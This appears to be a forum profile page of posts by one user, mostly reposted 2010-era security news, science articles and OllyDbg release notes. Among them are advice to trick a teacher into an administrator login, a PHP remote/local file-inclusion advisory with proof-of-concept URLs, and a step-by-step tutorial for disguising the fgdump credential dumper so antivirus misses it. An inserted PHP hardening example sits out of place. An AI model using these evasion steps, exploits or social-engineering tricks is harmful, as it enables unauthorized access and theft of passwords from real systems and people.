Everything posted by begood
-
HcJ | Zone-H.org nod32-antivirus.ro hacked by HcJ Who's the guy?
-
Administrator password
begood replied to spance2life's topic in Operating systems and hardware discussions
If you trick the teacher into logging you in as administrator, you can add administrator rights to your account. That way you won't have to worry about anything at all in the future.
-
Quantum entanglement, in which paired particles somehow influence each other at apparently instant, faster-than-light speeds, is maybe physics' most bizarre mystery. Now it might be possible to see entangled photons with the naked human eye. Although the very notion of quantum entanglement seems to fly in the face of everything we think we know about physics, the basic concept is simple enough. If two subatomic particles are entangled, then they are linked in such a way that it's impossible to describe one without measuring both. It's as though two particles act like one big particle, even if the two are spatially separated. Since the very act of measuring a particle alters it, this means that measuring one entangled particle automatically affects its partner. This effect has been observed at distances of nearly a hundred miles. One type of particle that physicists often entangle is the photon, the constituent particle of light. Photons are often used in entanglement experiments, where separated pairs are sent through detectors to see how quickly the measurement of one alters the other. In new experiments due to start in the next few months, physicists will simply replace mechanical photon detectors with their natural counterparts: human eyes. Although human eyes are often thought to be rather unimpressive compared to those of other animals, they are actually surprisingly powerful. Human eyes are wired to detect light as little as seven photons wide, and they very rarely detect false positives - photons the eyes think are there but actually aren't. This makes them perfectly decent photon detectors for an entanglement experiment, as long as physicists can entangle bundles of seven or more photons. Right now, the protocols being developed call for considerably more than that, as an initial pair of photons will ultimately be entangled with bundles of about a hundred photons. 
The photon pulse will then be sent to the eyes of the test subject, with the other half of the entangled pair sent to a regular detector. If all goes according to plan, the human observation of the light will lead to a measurable change in the other set that is then picked up by the detector. Of course, the eyes are no match for these mechanical detectors, but that isn't really the point of these experiments. Rather, those designing the experiments hope to demonstrate that quantum effects are not just some physics freak show, but rather something that tangibly exists in the visible world. That isn't just a public relations achievement; indeed, successfully using eyes will help show that entanglement is a robust enough process that it really can work at a level our eyes can see. [Scientific American] Soon you might be able to see quantum entanglement for yourself
-
OK Go (those guys from the treadmill video) employed a bunch of engineers from NASA's Jet Propulsion Laboratory to create this delightfully complicated Rube Goldberg machine music video. It's a must-watch. According to NASA Wiki, "More than 40 engineers, techies, artists, and circus types spent several months designing, building, rebuilding, and re-setting a machine that took up two floors of a Los Angeles warehouse." The song is titled "This Too Shall Pass," and even though it's been out for a little bit, we think it's worth noting one more time. //io9
-
Last update: June 02, 2010 - final release.

Here it is. You haven't heard much about OllyDbg 2.0 for a long time. Unfortunately, I am permanently busy and have not much free time. But there is a progress. I have made many changes and bugfixes, among them:

- prn bombed me with many, many ideas and found bugs. For example, he reported massive problems with UNICODE filenames that use extended charset. And no, Windows doesn't convert them automatically to ASCII. As OllyDbg is still an ASCII application, now I convert such names to old 8.3 DOS format. Active breakpoints were not marked in the corresponding breakpoint windows; memory breaks were falsely hinted, and so on, and so forth... Thank you, and please don't stop!
- William reported bugs with PUSH AH etc. Yes, there are no such commands, but OllyDbg v2.0 happily assembled them.
- Keyboard shortcuts did not work in Edit/Search dialog. Reported by mailnew2ster.
- Ange gave me the complete list of 80x86 commands as a compiled executable file. He found many assembly/disassembly errors. With his list, we were able to remove them. He also criticized my "English" help file for grammatical errors, silly old me!
- Eric, deepzero and karmany reported problems with highlighting and comments.
- John found out that Always on top may hide error messages.
- Aaron and many other reported crash on structure decoding, namely on those where some elements were unnamed, like elements of array.
- I thought that exe/dll with 5 MB code section is really large, until Ivar sent me an executable which code section was 83,079,168 bytes (SEVENTY NINE MEGABYTES) long! Analysis attempted to allocate more than 1,5 GB of memory - still not a problem, but due to fragmentation, my memory manager was unable to execute the request. It was necessary to redesign it.
- Rinze pointed at problem with memory breakpoints on stack. OllyDbg did not check memory addressed indirectly by ESP.
- NCR asked for the search for process name in Attach window by typing its name.
- numax suggested list of user comments.
- Hopefully OllyDbg will support Chinese and Japanese fonts in dialog boxes (Edit/Search data), main issue that we tried to debug together with locklose. It should work, but I can give you no warranty. Please check.
- And, a couple of days ago, edemko discovered that conditional jumps on LOOPZ/LOOPNZ are falsely predicted. This was the last bug corrected in the version 2.00.

The list is far from complete, altogether I received more than 100 reports and suggestions. So for all contributors: Without your help, OllyDbg 2.0 would not exist. Thank you very much!

And now about my plans for the future. Probably I will convert OllyDbg to UNICODE. There are too many places where ASCII is not fully supported by Windows, like file names with extended charset or controls that don't receive WM_WCHAR. This will mean end for Win95 and WinME users. Those who use WinNT, 2000, XP and Win7 will notice nothing. Of course, plugins will be forced to UNICODE, too.

I plan to introduce experimental plugin support in the version 2.01. The interface is not yet defined. If you have written plugins for v1.10, please send me your ideas and suggestions now!

Version 2.01 will finally work under 64-bit Windows. Probably I will start developing 64-bit OllyDbg, but this depends on my free time.

OllyDbg 2.0
-
This is a cheat sheet of shortcuts and tips for reverse-engineering malware. It covers the general malware analysis process, as well as useful tips for OllyDbg, IDA Pro, and other tools. Feel free to customize it to your own needs. My reverse-engineering malware course explores these, and other useful techniques. http://zeltser.com/reverse-malware/reverse_engineering_cheat_sheet.pdf Reverse-Engineering Malware Cheat Sheet by Lenny Zeltser
-
===========================================================================
PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability
===========================================================================

Home Page: http://setiathome.ssl.berkeley.edu/
download: http://www.mariovaldez.net/software/phpsetimon/
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================
Description:
The PHP SETI@home web monitor is a very simple PHP script to monitor single or multiple setiathome programs running in your workstation or server, via the local web server. If you don't know what is SETI@home, visit the SETI@home website.
=====================================================================

--=[ Vuln C0de ]=-

[-] path/seti.php
-----------------------------------------------------------------------------------------
require_once ("seticlients.inc.php");
require_once ("config.inc.php");
$ps_charset = "iso-8859-1";
if ($ps_cfg_language <> "")
    $ps_htmllang = "<meta http-equiv='Content-Type' content='text/html; charset=$ps_charset'>\n";
$ps_languages = array ("es" => 1, "en" => 1);
if (array_key_exists (strtolower ($ps_cfg_language), $ps_languages)) {
    $ps_cfg_language = strtolower ($ps_cfg_language);
    require_once ($ps_cfg_langfiles . $ps_cfg_language. ".inc.php");
}
else {
    $ps_cfg_language = "en";
    include($ps_cfg_langfiles . "en.inc.php");
}
require_once ("seti_lib.inc.php");
require_once ("seti_data.inc.php");
require_once ("seti_graphs.inc.php");
-----------------------------------------------------------------------------------------

-=[ P0C LFI ]=-
http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [LFI]%00

-=[ P0C RFI ]=-
http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================
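A hardened form of the language-file include from the advisory above, as an added example that is not part of the original post or of phpsetimon. The names `PS_LANG_DIR`, `PS_LANGUAGES` and `ps_language_file()` are hypothetical, and the layout (language files in a `lang` directory beside the script) is an assumption.

```php
<?php
// Added example (not phpsetimon code): resolve the language file without
// letting any request-controlled value take part in the include path.

// Assumption: language files live in a "lang" directory beside this script.
// A constant cannot be overwritten by a request parameter the way the
// $ps_cfg_langfiles variable is in the PoC URLs.
const PS_LANG_DIR = __DIR__ . '/lang';

// Allow-list mirroring the two languages seti.php accepts.
const PS_LANGUAGES = ['es', 'en'];

/**
 * Return the absolute path of the language file to include.
 * Anything outside the allow-list falls back to English.
 * $baseDir is a parameter only so the demo below can use a temp directory.
 */
function ps_language_file(string $requested, string $baseDir = PS_LANG_DIR): string
{
    $lang = strtolower(trim($requested));
    if (!in_array($lang, PS_LANGUAGES, true)) {
        $lang = 'en';
    }

    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('language directory missing');
    }

    // realpath() resolves ".." and symlinks; the result must still sit
    // directly inside the base directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $lang . '.inc.php');
    if ($path === false || dirname($path) !== $base) {
        throw new RuntimeException('language file missing or outside base directory');
    }
    return $path;
}

// Constructed demo: a throwaway language directory and a few constructed
// input values, including path-like and URL-like strings.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $dir = sys_get_temp_dir() . '/ps_lang_' . bin2hex(random_bytes(4));
    mkdir($dir);
    file_put_contents("$dir/en.inc.php", "<?php // English strings\n");
    file_put_contents("$dir/es.inc.php", "<?php // Spanish strings\n");

    $samples = ['ES', 'fr', "../config.inc.php\0", 'http://example.invalid/x'];
    foreach ($samples as $value) {
        printf("%-32s -> %s\n", json_encode($value), basename(ps_language_file($value, $dir)));
    }

    array_map('unlink', glob("$dir/*.inc.php"));
    rmdir($dir);
}
```

In a script like `seti.php` the two include statements would become a single `require_once ps_language_file($ps_cfg_language);`. Keeping `allow_url_include` disabled in php.ini (its default) blocks the remote-include variant as a second layer.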
-
This document is decided to give readers an outlook on how a penetration test can be successfully done on an organization. A methodology has been drawn out in this document to allow readers to be acquainted with the process that penetration testers go through to conduct a penetration test. http://www.sans.org/reading_room/whitepapers/auditing/conducting-penetration-test-organization_67
-
Good news for fans of 3D TV and Apple iPads: the porn industry is doing its very best to protect your favourite bits of kit. Despite Steve Jobs' best efforts to keep the iPad porn-free the adult industry is already adapting its content to make it iPad-friendly. Meanwhile in Japan, porn star Mika Kayama is going to do her thing in glorious 3D. That means both the iPad and 3D TV will be massive successes for a very long time. Everybody knows that given the choice between tech that's pristine and pure and tech that likes to get down and dirty, down and dirty always wins. Skin flicks help tech triumph, and formats without them flop. But is that actually true? Not any more. Let's travel back in time to a happier place, where the world was very different from today. Yep, we're talking about 2007. Amid rumours that Blu-ray firms weren't keen on making mucky movies in their pristine plants, the porn industry threw its weight behind HD DVD. One year later, HD DVD was dead. It turns out that what really mattered wasn't the adult industry, but the traditional film industry and the PlayStation 3. And that's because increasingly, porn is something that's viewed in a web browser, not bought on a disc. Because of that, Steve Jobs' anti-porn stance is utterly meaningless. As long as Apple kit ships with a web browser, people will be able to view pornography on it. iPad porn doesn't mean apps; it means nothing more than "we're re-encoding our video clips." It wasn't just the delivery mechanism, though - it was the quality. Pornography has the same "good enough" problem that music has: beyond a certain point, any improvements are incremental. That's why Super Audio CD bombed: most people were perfectly happy with low-bitrate MP3s on rubbish headphones or cheap stereos. With pornography, once the quality's good enough that you can differentiate between People Totally Doing It and a documentary about pigs, a few extra pixels don't make a lot of difference. 
Then again, 3D doesn't just offer pixels: it offers a whole new dimension. So let's pretend that the market for shiny video discs isn't dying. If the adult industry embraced 3D, would that shift 3D TVs? Would there be enough business to justify the extra cost of producing 3D porn? We doubt it. Whether it's a 3D PC or a 3D TV, adding an extra dimension isn't cheap: you're looking at a brand new TV or monitor and a 3D-capable player or video card. That's a big investment for what we suspect isn't going to be an awfully long viewing experience. Read more: Will 3D porn be the making of 3D TV? | News | TechRadar UK
-
Two weeks ago the largest BitTorrent tracker on the Internet vanished. The hosting company of the tracker was ordered to take it offline after Hollywood managed to get a court decision in their favor. Today, OpenBitTorrent returns to the web from a new home, managing torrent connections as if nothing happened. In the last year or two the entertainment industries have targeted many BitTorrent sites. The majority of the verdicts against these sites have thus far ruled in favor of the copyright holders. Only in Spain have BitTorrent sites been repeatedly found to operate within the boundaries of the law. Of all the BitTorrent related websites OpenBitTorrent has been one of the most surprising targets. The tracker, which doesn’t link to or host any torrent files and is not linked to any torrent search engine, merely serves as a facilitator of the communication between torrent users, much like BitTorrent clients do. Despite this neutral and apparent non-infringing setup, the Swedish Court of Appeals ruled against the site two weeks ago. In a surprising verdict in a case started by Hollywood movie companies, the Court handed out an injunction to OpenBitTorrent’s hosting provider Portlane, ordering it to cease to provide Internet access to the tracker. The OpenBitTorrent site and tracker returned a few hours ago Following this decision OpenBitTorrent was pulled offline. TorrentFreak contacted the operators of the site who told us that they would be looking for a new hosting provider to bring back their tracker, so it could continue to coordinate the communications between the millions of people that were using it daily. Today, we were informed that OpenBitTorrent has finally found a new hosting company, interestingly enough one that is run by a Spanish company. Just hours after the tracker and its website returned, some 20 million peers spread over 200,000 torrents were already connected to the tracker and business continued as usual. 
OpenBitTorrent is currently battling for the title of the world’s largest BitTorrent tracker with PublicBitTorrent, another standalone tracker that runs on the Opentracker software. Both trackers handle the communications of between 20 and 30 million BitTorrent users at any given time of the day. Although it’s good to see that OpenBitTorrent has been resurrected, it’s worth noting that the majority of all BitTorrent users probably never noticed that it had disappeared. Most torrents today come with several backup trackers that are used in case one goes down, and even without trackers at all DHT ensures that downloads continue to work. OpenBitTorrent Tracker Returns After Hollywood Shutdown | TorrentFreak
-
First of all, I was floored when this worked. Really AV? It’s that easy? Really? So here is the break down, go get “Resource Hacker”… You’re almost done. Only 3 steps left. (1 of which is optional)

I started with fgdump, a well known hashdumping/pwdump tool. It’s detected by 80% of all AVs and by all the top 10. You see this on your AV report for your domain controller, and you’re having a bad day, probably week. Watch this magic trick though:

[*] Step 1: Open Res Hacker and drag a “normal” executable on to the window or Open File. Click “Save All Resources”. Essentially what you are doing in this step is simply extracting the .ico file (Icon) from the executable. Now you can do this with other tools, but we’ll be using resource hacker in a minute again, so it’s just easy to do it all with one tool. We are done with this executable unless you are doing Step 2, in that case, leave it open, open another Res Hacker window and open your ‘evil’. (In our case, fgdump.exe)

[*] Step 2 (Optional): If your destination executable has tell-tale signs of its intent, much like fgdump as seen below: You can simply copy and paste the version info from your ‘normal’ executable into your new one and hit “Compile Script”:

[*] Step 3: Next we need to “Add a new Resource” (our icon) into our “evil” binary. Once this prompt comes up, select the ICO file that shows the icon you want it to have (some binaries have a ton, so make sure it’s the right one). Put in ‘1’ for resource name, and ‘1033’ for your resource language. (You can play with these values, not sure what impact they have, but from the binaries I’ve looked at those values are pretty standard for a windows executable). Save your new awesome binary as something else, I chose vlc2.exe

And… (drum roll) Tada! Sad isn’t it? Only 1 of the top 10 AV now detect this binary. Good job AVG and Avast! You still picked it up, but Trend, Symantec, Microsoft, ClamAV, Kaspersky, Panda, Norman, NOD32, Sunbelt, F-Secure, Fortinet, BitDefender WTF guys!? Oh and Kaspersky now flags it as “not-a-virus” but still flags it.

Room362.com - Blog - AV bypass made stupid
-
One of the lesser-known jewels of HTML 5 is link prefetching. The idea is to extend the time-honored concept of image preloading to HTML content (and without any messy AJAX code). Here’s how it works: You add a line like this to your page:

<link rel="next" href="page2.html">

Then the browser automatically downloads page2.html in a background process as soon as the user’s computer is idle. When the user finally clicks a link to page2.html, the browser serves it from the cache, and so it loads significantly faster.

Link prefetching is currently only supported by Firefox. But since Firefox is the second most popular web browser in the world, you can noticeably decrease load times for a significant chunk of your users just by adding one line of code to your HTML. Pretty cool, huh?

Here are some ways you could use link prefetching:

* Anytime you split content across multiple pages, as in large articles, online tutorials, image slideshows, etc.
* On your homepage to preload whatever page your users tend to click on next. (That could be the “features” page on a product site or your most recent entry on a blog.)
* On a search engine to prefetch the top result.

You can also use it for static content using the prefetch rel:

<link rel="prefetch" href="/images/big.jpeg">

A couple other interesting points:

* Link prefetching will probably pop up in Opera, Chrome and Safari soon, and in Internet Explorer sometime around 2020.
* If this becomes popular it has the potential to skew logs and stats. Consider what happens when a bunch of prefetch requests are made to one of your pages, but the user never actually visits the page. The server (or stats package) doesn’t know the difference. To clear this up, Firefox sends along an HTTP header, X-moz: prefetch, but you need some logic on the server side to detect it.

To learn more about link prefetching and see other examples, see the article about it on Mozilla’s site: https://developer.mozilla.org/en/link_prefetching_faq

http://keyboardy.com/programming/html5-link-prefetching/
-
overview

Contempt is a framework for designing visual representations of data obtained in a penetration test. Contempt is implemented using the Eclipse Rich Client Platform. A seed is an extensible framework for resource management. It runs as a daemon on a system, and accepts commands from the contempt UI. Seeds can then act as "agents", able to manipulate various resources on remote hosts. Data gathered is collected in a lightweight database, which is managed by the contempt UI.

current

0.6.0 is going through some final testing

new features in 0.6.0

- Revamped key management system
- Easily manage users on remote seeds
- Added a nice webstart based installer
- Added collaborative network scanning

seedsofcontempt - Project Hosting on Google Code
-
Well, tell us what you can actually do, bro, not just "hi, hi". What do you work in? IT programmer, wow, I'm floored.
-
According to a post from Brandon LeBlanc, who is responsible for Microsoft's official Windows team blog, there is some irony that's "hard to overlook" in Google's getting rid of Windows. For instance, the renowned Yale University has apparently halted their move to Google Mail and Google Apps, citing security and privacy concerns. LeBlanc says the security of Windows isn't all that bad. According to his post, even hackers admit that Microsoft are doing a better job making their products more secure than anyone else. Security specialist Intego says that Apple Mac OS X is not by any means a malware free option. Intego warns that popular software portals such as Softpedia, MacUpdate and VersionTracker offer applications and screen savers for Mac OS X which infect computers with spyware. Intego say that while downloaded applications don't contain the malware itself, they retrieve the OSX/OpinionSpy spyware once they have been installed. Among other things, OpinionSpy opens a back door to collect data about the user's installed files, access credentials, credit card details and online behaviour and sends this information to a server on the internet. The Financial Times reported that Google's decision to phase out the Windows operating system on a corporate level was based on security concerns and the larger amount of malware in active circulation for this operating system. According to the paper, Google accelerated the implementation of its directive to move to Mac OS X and Linux after being hacked by intruders who were presumed to be Chinese. The hack provided even further potential for irony: The attackers exploited a hole in Internet Explorer 6 to compromise a Google computer. However, the more secure versions 7 and 8 of Microsoft's browser were already available at the time. Experts have since puzzled over why Google's employees were using an obsolete version. Microsoft themselves have now decided to phase out Internet Explorer 6. 
Microsoft comments on Google's Windows ban - The H Security: News and Features
-
Originally expected for today, Mozilla has confirmed that it is delaying the release of version 3.6.4 of its open source Firefox web browser, the next security and stability update to the 3.6.x branch of Firefox. Instead, Mozilla has announced the availability of a release candidate for public testing. The Firefox 3.6.4 release candidate addresses several bugs found in the previous beta. The 3.6.4 update includes, for example, technology from the Mozilla Lorentz Project. Lorentz is designed to bring full process isolation to Firefox, separating web pages and plug-ins from the main browser by running them in their own processes. When a web page or plug-in crashes, with process isolation, the rest of the browser is unaffected by the failure, resulting in a more reliable browser. The developers note that, should no issues be found during testing of the RC, it will officially be released as Firefox 3.6.4. However, a final release date for Firefox 3.6.4 has yet to be confirmed. As with all development releases, use in production environments and on mission critical systems is not advised. Users testing the release are encouraged to provide feedback and report any bugs that they encounter. More details about the development preview, including a list of known issues, can be found in the Mozilla Developer Center news announcement and in the release notes. The Firefox 3.6.4 release candidate is available to download for Windows, Mac OS X and Linux from the project's web site. Firefox binaries are released under the Mozilla Firefox End-User Software License Agreement and the source code is released under disjunctive tri-licensing that includes the Mozilla Public Licence, GPLv2 and LGPLv2.1. The latest stable release of Firefox is version 3.6.3 from the beginning of April. Mozilla delays Firefox 3.6.4 - The H Security: News and Features
-
Ruby on Rails is used in metasploit and many other open source security and hacking tools. Thus as a security professional or as a hacker, we need to know how to work with this language. Also, we hackers generally prefer to pick up things in a fast track. This video series is just that - Ruby on Rails 1-day course from UC Berkeley. All the presentations and other material can be downloaded here. http://securitytube.net/A-Hacker%27s-Guide-to-Ruby-on-Rails-video.aspx
-
I don't like it as a logo, but it works as a wallpaper. Make it a wallpaper [1152x864]
-
How to find vulnerabilities, write shellcode, exploit the vulnerability and finally turn it into a Metasploit exploit module! David Hoelzer is a Senior Fellow with the SANS Institute and author of the SANS Secure Coding in C/C++ course. He also regularly teaches incident handling, forensics and IT Audit courses for SANS: SANS: Auditing Networks, Perimeters, and Systems For the source code used in this demonstration, go here: http://www.enclaveforensics.com/Blog/files/e6fb7327cb615688f90fc07656a3880d-28.html
-
Man-made DNA has booted up a cell for the first time. In a feat that is the culmination of two and a half years of tests and adjustments, researchers at the J. Craig Venter Institute inserted artificial genetic material — chemically printed, synthesized and assembled — into cells that were then able to grow naturally. “We all had a very good feeling that it was going to work this time,” said Venter Institute synthetic biologist Daniel Gibson, co-author of the study published May 20 in Science. “But we were cautiously optimistic because we had so many letdowns following the previous experiments.” On a Friday in March, scientists inserted over 1 million base pairs of synthetic DNA into Mycoplasma capricolum cells before leaving for the weekend. When they returned on Monday, their cells had bloomed into colonies. “When we look at life forms, we see fixed entities,” said J. Craig Venter, president of the Institute, in a recent podcast. “But this shows in fact how dynamic they are. They change from second to second. And that life is basically the result of an information process. Our genetic code is our software.” Coaxing the software to power a cell proved harder than expected. After the Venter Institute announced in early 2008 that it had assembled a synthetic Mycoplasma genitalium genome, the assumption was that it would be running cells in no time. But this particular cell type, despite its minimal size, was not an ideal research partner. One problem was speed. “We had to deal with the fact that M. genitalium had an extremely slow growth rate,” Gibson said. “For every experiment that was done, it took more than a month to get results.” Moreover, transplanting the code into recipient cells was failing. So researchers cut their losses and called in a substitute, opting for the larger, speedier and less finicky Mycoplasma mycoides. The choice was a good one. 
“Over the last five years the field has seen a 100-fold increase in the length of genetic material wholly constructed from raw chemicals,” said synthetic biologist Drew Endy of Stanford University. “This is over six doublings in the max length of a genome that can be constructed.” Plunging costs of synthesis allowed a leap past the 1 million base-pair mark, from code to assembly. “Imagine doubling the diameter of a silicon wafer that can be manufactured that much, going from 1 cm to 1 meter [fabrications] in just five years,” Endy said. “That would have been an incredible achievement.” “They rebuilt a natural sequence and they put in some poetry,” said University of California at San Francisco synthetic biologist Chris Voigt. “They recreated some quotes in the genome sequence as watermarks.” It’s an impressive trick, no doubt, but replicating a natural genome with a little panache is also the limit of our present design capabilities. Researchers, for instance, figure yeast can handle the assembly of 2 million base pairs, but they’re not sure about more. And an energy-producing cyanobacteria that sequesters carbon, Gibson says, is still several years off. The ultimate goal, of course, is a brand-new genome from the ground up. Now, Voigt said, “what do you do with all that design capacity?” Read More Scientists Create First Self-Replicating Synthetic Life | Wired Science | Wired.com
-
Seismic waves traveling between Earth’s poles move faster than those moving east-west, and now scientists think they may know why. The iron alloys in the solid inner core of the Earth appear to have crystallized in such a way that it’s easier for energy to pass on the north-south axis than on the east-west, as described in a new study led by Maurizio Mattesini, a geologist at the Universidad Complutense de Madrid, which appeared in the journal Proceedings of the National Academy of Sciences. “The structure of the atoms looks different in one direction than the other,” explained Norm Sleep, a Stanford geologist who was not part of the new study. In the textbooks of yore, the Earth’s inner regions like the mantle and core were presented as simple, fairly homogeneous regions. But the geology of the core is turning out to be much more complex as scientists make use of more and better seismographs to generate better data about how seismic waves travel through the planet. The outer core is composed mostly of liquid iron. The inner core is a solid ball about 750 miles in diameter, or a little less than the maximum width of the state of Texas, which formed as the Earth cooled over geologic time, said David Stephenson, a geologist at CalTech. “The center of the earth is literally a crystal,” said Stephenson. Over time, it grew and now is no longer a single crystal but an aggregate of them. In the mid-1990s, geologists began to notice an interesting thing. Seismic waves traveling north-south were reaching their destinations about 3 percent faster than waves moving along east-west paths. “It’s one of these things that’s been detected for some time but kind of why it occurs has been somewhat of a puzzle,” Sleep said. They didn’t know why, but then again, the middle of the globe is perhaps the most difficult place to gather data on Earth. The new paper suggests that as the crystals formed, they received a particular alignment. 
That alignment, known as anisotropy, makes it easier for waves to travel in one direction than the other. The most significant thing about the new paper, Stephenson said, is that the researchers were able to match up the results that seismologists have been getting on the speed of seismic waves through the core with new laboratory tests with particular kinds of iron crystals. Read More The Crystals at the Center of the Earth | Wired Science | Wired.com
-
One isn’t such a lonely number. All life on Earth shares a single common ancestor, a new statistical analysis confirms. The idea that life forms share a common ancestor is “a central pillar of evolutionary theory,” says Douglas Theobald, a biochemist at Brandeis University in Waltham, Massachusetts. “But recently there has been some mumbling, especially from microbiologists, that it may not be so cut-and-dried.” Because microorganisms of different species often swap genes, some scientists have proposed that multiple primordial life forms could have tossed their genetic material into life’s mix, creating a web, rather than a tree of life. To determine which hypothesis is more likely correct, Theobald put various evolutionary ancestry models through rigorous statistical tests. The results, published in the May 13 Nature, come down overwhelmingly on the side of a single ancestor. A universal common ancestor is at least 102,860 times more probable than having multiple ancestors, Theobald calculates. No one has previously put this aspect of evolution through such a stringent test, says David Penny, a theoretical biologist and Allan Wilson Centre researcher at Massey University in Palmerston North, New Zealand. “In one sense, we are not surprised at the answer, but we are very pleased that the unity of life passed a formal test,” he says. He and Mike Steel of the University of Canterbury in Christchurch, New Zealand, wrote a commentary on the study that appears in the same issue of Nature. For his analysis, Theobald selected 23 proteins that are found across the taxonomic spectrum but have structures that differ from one species to another. He looked at those proteins in 12 species — four each from the bacterial, archaeal and eukaryotic domains of life. Then he performed computer simulations to evaluate how likely various evolutionary scenarios were to produce the observed array of proteins. 
Theobald found that scenarios featuring a universal common ancestor won hands down against even the best-performing multi-ancestor models. “The universal common ancestor (models) didn’t just explain the data better, they were also the simplest, so they won on both counts,” Theobald says. A model that had a single common ancestor and allowed for some gene-swapping among species was even better than a simple tree of life. Such a scenario is 103,489 times more probable than the best multi-ancestor model, Theobald found. Theobald’s study does not address how many times life may have arisen on Earth. Life could have originated many times, but the study suggests that only one of those primordial events yielded the array of organisms living today. “It doesn’t tell you where the deep ancestor was,” Penny says. “But what it does say is that there was one common ancestor among all those little beasties.” Read More Life on Earth Arose Just Once | Wired Science | Wired.com
-
LIMASSOL, CYPRUS--The scareware and rogue anti-virus epidemic that has been earning attackers millions of dollars for the last few years has spawned a devious new offspring: SMS blockers. This class of malware, which demands that users send SMS text messages to premium numbers, has recently taken off in huge numbers in Russia and parts of Asia, experts say. SMS blockers, or simply blockers, as they're known, are a clever evolution of the old ransomware or scareware tactic of demanding a payment in exchange for either removing some malware on a PC or decrypting the user's hard drive, which the ransomware encrypted in the first place. These tactics have been extremely profitable for scammers in the last four or five years, earning some gangs millions of dollars per year. In recent months there has been a major uptick in the volume of SMS blockers hitting users in Eastern Europe--particularly Russia--and parts of Asia. The scam is as simple as it is effective: A victim visits a malicious site, or perhaps a legitimate site that has been compromised and loaded with attack code, and her machine is infected with a piece of malware. The victim will then start seeing dialog boxes with a message demanding payment in order to disinfect the machine. But, in order to disinfect the PC, the victim must send an SMS message from her mobile phone to a premium number controlled by the attacker, typically at a cost of about $10, said Boris Yampolsky, a malware researcher at Kaspersky Lab, in a talk at the company's Security Analyst Summit here Wednesday. In some variations of the scam, victims see a pornographic picture in a pop-up window, which is impossible to remove until the SMS message is sent. Some of the scams also require victims to send two separate messages, totaling $20. Other variations tell the victim that her Windows license is invalid and she must send an SMS to re-activate it. In all cases, the machine essentially becomes unusable until the payment is made. 
The new scam relies on an ecosystem of entities behind the scenes in order to work. In a typical set-up, the scammer buys a short SMS number from an aggregator, who in turn has purchased the number from a mobile operator. Once a victim is infected, the SMS that she is instructed to send will typically contain a code that essentially identifies the scammer who infected her. The mobile operator pays the aggregator his fee, half of which is then forwarded to the scammer. Yampolsky, who has been tracking these scams in Russia, estimates that there are as many as 500,000 SMS blocker infections each day. "The code is sophisticated. They use obfuscation and anti-emulation techniques to make it hard for us to analyze it," he said. SMS blockers haven't made much of a dent in the United States and other Western countries as yet, Yampolsky said, because it's more difficult for scammers to get the SMS numbers required for the attack. But that may change in the future as they figure out ways around the restrictions in the U.S. SMS Blockers: The New Face of Ransomware | threatpost